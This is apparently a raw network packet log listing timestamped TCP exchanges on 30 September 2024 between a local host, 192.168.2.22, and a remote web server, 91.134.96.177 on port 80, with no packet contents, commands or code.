                                                                                                                                                                                                Sep 30, 2024 16:24:36.621140003 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.621176958 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.621500015 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.621510983 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.622282028 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.622319937 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.622378111 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.622469902 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.622481108 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.622519970 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623656034 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623667955 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623678923 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623689890 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623727083 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623795033 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623806953 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623817921 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623820066 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.623859882 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624051094 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624062061 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624070883 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624082088 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624094963 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624095917 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624121904 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624874115 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624886036 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624897003 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624907017 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624917984 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624922991 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624927998 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624938965 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624939919 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.624963045 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.625021935 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.625032902 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.625042915 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.625051975 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.625053883 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.625073910 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.625195026 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.626879930 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.626890898 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.626902103 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.626929998 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.627978086 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628154993 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628165960 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628175974 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628202915 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628321886 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628333092 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628341913 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628348112 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628362894 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.628376007 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630028963 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630042076 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630052090 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630063057 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630074024 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630084991 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630085945 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630095005 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630105972 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630114079 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630184889 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630196095 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630206108 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630215883 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630223036 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630225897 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630249023 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630913973 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630927086 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.630960941 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.637921095 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667335033 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667352915 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667363882 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667375088 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667392969 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667402983 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667406082 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667414904 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667474031 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667474031 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667601109 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667610884 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667620897 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667632103 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667632103 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667642117 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667650938 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667651892 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667661905 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667670012 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667673111 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.667691946 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668150902 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668423891 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668435097 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668446064 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668469906 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668797970 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668808937 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668818951 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668829918 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668845892 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.668858051 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679802895 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679815054 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679824114 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679833889 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679843903 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679864883 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679864883 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679919004 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679929972 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.679959059 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705056906 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705334902 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705346107 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705362082 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705378056 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705389023 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705395937 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705405951 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705415010 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705418110 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705434084 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705442905 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705449104 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705455065 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705461025 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705465078 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705476046 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705481052 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705596924 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705622911 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705670118 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705681086 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.705702066 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706043005 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706053019 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706063986 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706073999 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706075907 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706084013 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706094980 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706103086 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706104994 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706115007 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706125021 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706125021 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706135988 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706136942 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706146002 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706156015 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706161022 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706166983 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706182957 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706502914 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706535101 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706628084 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706639051 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706649065 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706659079 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706669092 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706670046 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706681967 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706734896 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706746101 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706757069 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706767082 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706777096 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706777096 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706794977 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706799984 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706821918 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.706926107 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707117081 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707127094 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707159042 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707204103 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707493067 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707504034 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707514048 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707530022 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707539082 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707550049 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707559109 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707568884 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707577944 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707597971 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707726955 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707736969 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707746983 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707756996 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707766056 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707767010 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707777023 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707783937 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707787037 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707798004 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707804918 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707808018 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.707818031 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.708946943 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.708957911 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.708967924 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.708977938 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.708987951 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.708988905 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.708997965 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709007025 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709007978 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709017992 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709018946 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709028959 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709048986 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709103107 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709112883 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709124088 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709134102 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709141016 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709144115 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709153891 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709161043 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709165096 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709182024 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709444046 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709640026 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709650040 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709660053 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709670067 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709678888 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709681034 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709692001 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709697962 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.709718943 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751399994 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751535892 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751548052 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751559019 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751588106 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751595020 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751617908 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751703024 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751713991 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751723051 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751741886 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751748085 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751775026 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751876116 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751892090 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751904011 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751914024 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751933098 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751935005 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751945972 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.751962900 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753392935 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753403902 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753413916 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753432989 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753510952 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753521919 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753535032 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753556013 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753561020 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753572941 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753599882 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.753985882 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764839888 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764852047 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764863014 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764893055 CEST4917380192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764904976 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764918089 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764930010 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764940023 CEST804917391.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:36.764957905 CEST4917380192.168.2.2291.134.96.177
